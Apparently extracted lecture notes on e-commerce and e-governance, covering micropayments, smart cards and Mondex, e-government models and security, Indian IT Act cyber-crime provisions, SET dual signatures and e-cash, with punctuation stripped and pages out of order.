secure payment system from an untrusted (unknown) company Therefore the market entry
barriers for new providers are high Any company that wishes to enter this area must have plenty
of capital and be willing to invest a lot before return on investment as it is extremely difficult for
new payment systems to achieve widespread acceptance
Payment options ndash
Micropayment providers offer various payment modules Merchants need to sign up for an account with a chosen provider and decide for a module that suits their needs The customer gets an option (or options) how to pay for desired content or goods
The most common micropayment options are listed below 6) Call2pay Payment by telephone The customer is requested to call a toll number The fee is set on a per-call basis for the desired payment amount
Handypay Payment via mobile phone bill The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment
Ebank2pay Payment using online banking The customer transfers the payment amount his or her online banking access and a TAN After making payment the customer receives access to the purchased product
Credit card Payment per credit card The customer enters his credit card data and confirms the transaction The transactions can be optionally carried out with the 3-D Securetrade method (verified by VISAtrade and Mastercard SecureCodetrade)
Direct debit
PREPARED BY ARUN PRATAP SINGH 33
33
Payment by direct debit The customer enters his or her bank ID and account number and confirms the direct debit authorization
PayPal MicroPayments is a micropayment system that charges payments to
users PayPal account and allows transactions of less than US$12 to take place The service is
as of 2013 offered in select currencies only
Micropayment Uses ndash
Publishing
Marketing
Software
Entertainment
Web Services
SMART CARD
A smart card chip card or integrated circuit card (ICC) is any pocket-sized card with
embedded integrated circuits Smart cards are made of plastic generally polyvinyl chloride but
sometimes polyethylene terephthalate based polyesters acrylonitrile butadiene
styrene orpolycarbonate Since April 2009 a Japanese company has manufactured reusable
financial smart cards made from paper
Smart cards can provide identification authentication data storage and application
processing[2] Smart cards may provide strong security authentication for single sign-on (SSO)
within large organizations
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
What is Smart Card
Standard credit card-sized with microchip embedded on it
Two types
Memory-only chips
Microprocessor chips
Can hold up to 32000 bytes
Newer smart cards have math co-processors
PREPARED BY ARUN PRATAP SINGH 34
34
Perform complex encryption routines quickly
In 1968 German inventors patent combination of plastic cards with micro chips
Construction of Smart Cards ndash
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 19
19
Step 3 Finally he compares the two terms H[H[PI] || H[OI]] and
DRSA[DS | keypublic_signcardholder ]
They should be the same if the transmitted DS has not been changed otherwise the order is
not valid
The payment gateway is provided with PI H[OI] and DS
By using the dual signature method each cardholder can link OI and PI while releasing
only the necessary information to the relevant party
If either the OI or PI is changed the dual signature will no longer be valid
DIGITAL ENVELOPE ndash
PREPARED BY ARUN PRATAP SINGH 20
20
SET PROTOCOL ndash
SET protocol has four phases initiation purchase authorization and capture
First the cardholder sends a purchase initiation request to the merchant for initializing
the payment
Then the merchant returns a response message to the cardholder
In the second phase the cardholder sends the purchase order together with the
payment instruction to the merchant
In the third phase the merchant obtains the authorization from the issuer via the
payment gateway
Finally the merchant requests a money transfer to its account
E-CASH
Electronic money is paperless cash This money is either stored on a card itself or in an account
associated with the card
The most common examples are transit cards meal plans and PayPal E-Cash can also mean
any kind of electronic payment
Electronic payment systems come in many forms including virtual cheques ATM cards credit
cards and stored value cards The usual security features for such systems are privacy
authenticity and no repudiation
There are four major components in an electronic cash system
Issuers
Customers
Merchants or traders
Regulators
Issuers can be banks or non-bank institutions
PREPARED BY ARUN PRATAP SINGH 21
21
customers are referred to users who spend E-Cash
Merchants and traders are vendors who receive E-Cash
regulators are defined as related authorities or state tax agencies
For an E-Cash transaction to occur we need to go through at least three stages
Account Setup Customers will need to obtain E-Cash accounts through certain issuers
Merchants who would like to accept E-Cash will also need to arrange accounts from
various E-Cash issuers Issuers typically handle accounting for customers and
merchants
Purchase Customers purchase certain goods or services and give the merchants
tokens which represent equivalent E-Cash Purchase information is usually encrypted
when transmitting in the networks
Authentication Merchants will need to contact E-Cash issuers about the purchase and
the amount of E-Cash involved E-Cash issuers will then authenticate the transaction
and approve the amount E-Cash involved
E-cash payment system ndash
For accessing the services online e-cash is a prime method for secure online payments
The following model shows how e cash payment system works
PREPARED BY ARUN PRATAP SINGH 22
22
This is a simple model of E-cash payment system This gives us the idea of how e-cash
payment system works The model is explained properly in upcoming slides
The customer approaches his issuer(bankrsquos) site for accessing his account The issuer in return
issues the money in form of a token which is generally in form of tens and hundreds or as per
specified by the customer
In second phase the customer will endorse those tokens to the merchant for acquiring services
for which the customer will authenticate the payment for the trader
PREPARED BY ARUN PRATAP SINGH 23
23
In third phase the trader will approach the token issuer(customerrsquos bank) and after
authenticating the tokens the issuing bank will convert the tokens into electronic fund and the
same will be transferred into traderrsquos account
Finally after getting the payment for the respective services the trader provides the requisite
service or product and also notifies the customer about the approval of payment made by
customer in traderrsquos account
A system that allows a person to pay for goods or services by transmitting a number
from one computer to another
Like the serial numbers on real currency notes the E-cash numbers are unique
This is issued by a bank and represents a specified sum of real money
PREPARED BY ARUN PRATAP SINGH 24
24
It is anonymous and reusable
Electronic Cash Security
Complex cryptographic algorithms prevent double spending
Anonymity is preserved unless double spending is attempted
Serial numbers can allow tracing to prevent money laundering
E-Cash Processing
E-cash security
Security is of extreme importance while handling the online transactions Faith in the security of
the medium of exchange whether paper or digital is essential for the economy to function
E-cash is much secure than other online payment modes because in this case no credential such
as card-passwords or anything such is involved Its like simply the online fund transfer from
customerrsquos account to traderrsquos account
PREPARED BY ARUN PRATAP SINGH 25
25
However while accessing the customerrsquos account the customer must keep in mind the internet
security sweep or theft The online hacking and cracking can be avoided by using SSL and TSL
website security systems and keeping the website link with safe ldquoHttps ldquo protocols and proper
internet security softwares to keep aside the threats of malware evasdrooping and other security
threats
Advantages
We can transfer funds purchase stocks and offer a variety of other services without
having to handle physical cash or cheques
Electronic cash protects its user against theft With electronic cash the customer does
not need to provide financial information
E-cash supports small payments Other online payment system charge a fee for every
transaction no matter how much high or low it is but e-cash has a specific limit for
additional charges thatrsquos why very low payments are not charged a fee
Limitations
Maybe how much secure the e-cash payment system is but still no one is safe against
the online frauds In this case the trader is referred as fraudulent The trader may take
the amount but may not provide the services
While making the payment its very important that the internet connection and power
supply should be active If the payment is in process and internet supply fails in between
it can lead to loss of information ie amount will be charged but it wont reach to trader
and the refund takes very long time in general the refund time is at least 30-45 days
E-Cash is not for everyone Low income segments without computer and internet access
are unable to enjoy the usage of E-Cash
